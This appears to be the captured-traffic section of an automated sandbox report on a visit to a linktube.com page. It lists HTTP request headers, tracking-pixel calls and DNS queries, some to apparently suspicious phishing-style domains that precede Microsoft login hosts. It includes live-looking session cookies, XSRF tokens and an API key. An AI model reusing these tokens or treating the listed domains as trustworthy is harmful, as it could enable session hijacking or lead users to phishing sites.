linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D; __stripe_mid=2c71df39-66fe-42db-9093-61bda809e4b7105ee8; __stripe_sid=70018561-0e8f-4748-b150-3fd95dbfabedc02bd2If-None-Match: "6d506-MYSXW9oSH4TsSlb/06ylcHpFaFo"
Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "bfaea686c03759b91a2f6bb9d56b58f8"If-Modified-Since: Wed, 26 Mar 2025 18:11:24 GMT
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: trigger, event-source=navigation-sourceAttribution-Reporting-Support: not-os, webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: trigger, event-sourceAttribution-Reporting-Support: web;osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/me HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-XSRF-TOKEN: eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ==X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/jsonsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D; __stripe_mid=2c71df39-66fe-42db-9093-61bda809e4b7105ee8; __stripe_sid=70018561-0e8f-4748-b150-3fd95dbfabedc02bd2
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceAttribution-Reporting-Support: web;osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sdk/get_info HTTP/1.1Host: api.factors.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source;navigation-source, triggerAttribution-Reporting-Support: webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922178&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source, trigger;navigation-sourceAttribution-Reporting-Support: webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922192&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sdk/get_info HTTP/1.1Host: api.factors.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922221&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922224&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sw.js HTTP/1.1Host: linktube.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://linktube.com/sw.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; __stripe_mid=2c71df39-66fe-42db-9093-61bda809e4b7105ee8; __stripe_sid=70018561-0e8f-4748-b150-3fd95dbfabedc02bd2; XSRF-TOKEN=eyJpdiI6IklwdnNpVGl4Uk1pSWh5b2NRZ3l5UGc9PSIsInZhbHVlIjoiR0NobUNsZjUyTWgxMEVRbzRDY1pMM1ZhTlREczV3cllVckpkYlRFUWttanBZUFIyd1N4UXg2cGlKK2Rhd3BWLyIsIm1hYyI6ImQxOTFkNzhlN2I3NDc3Yzg1YmI1MGU2NDliOTA1MTZlYTI2MjhkZmI2M2FkNjIwNjc4YjhmMDlkYWM1NzZhOTQifQ%3D%3D; linktube_session=eyJpdiI6IlMwK2FMakZmWFVWZldWWUhPek9EYkE9PSIsInZhbHVlIjoiNEJsTGdkR1FQN1gwSEVqekRDU05BTEJIOFA0cnIrUk1tNFh1OEFZVTgyY1VYRFB0N0RvWTN6MWQrK1Z3R2pSdyIsIm1hYyI6IjRjMzU5Njg1M2EzYTJmZWIwNjA3Zjc3NDYyNGQ2MGFhYmI5MzJiNTE5YTYwYjA0Zjc4MmVkYzJlY2M4NDI0MmUifQ%3D%3DIf-None-Match: W/"3e3-18b71168bb5"If-Modified-Since: Fri, 27 Oct 2023 12:23:04 GMT
Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1Host: m.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: m=c4bc4dd8-6df4-49be-9044-d89092d4a6e576af86; cid=df325e98-7a09-4270-a9d3-78ac973a154a
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cid=df325e98-7a09-4270-a9d3-78ac973a154a
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: blog.lenodal.com
Source: global trafficDNS traffic detected: DNS query: linktube.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: api.bufferloop.com
Source: global trafficDNS traffic detected: DNS query: api.linktube.com
Source: global trafficDNS traffic detected: DNS query: js.stripe.com
Source: global trafficDNS traffic detected: DNS query: app.factors.ai
Source: global trafficDNS traffic detected: DNS query: api.factors.ai
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: apressa.com.br
Source: global trafficDNS traffic detected: DNS query: hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 5382072737-1317754460.cos.ap-bangkok.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: office.com
Source: global trafficDNS traffic detected: DNS query: m.stripe.network
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: 404.ecohmlsdeltiempo.it.com
Source: global trafficDNS traffic detected: DNS query: m.stripe.com
Source: global trafficDNS traffic detected: DNS query: stripe.com
Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
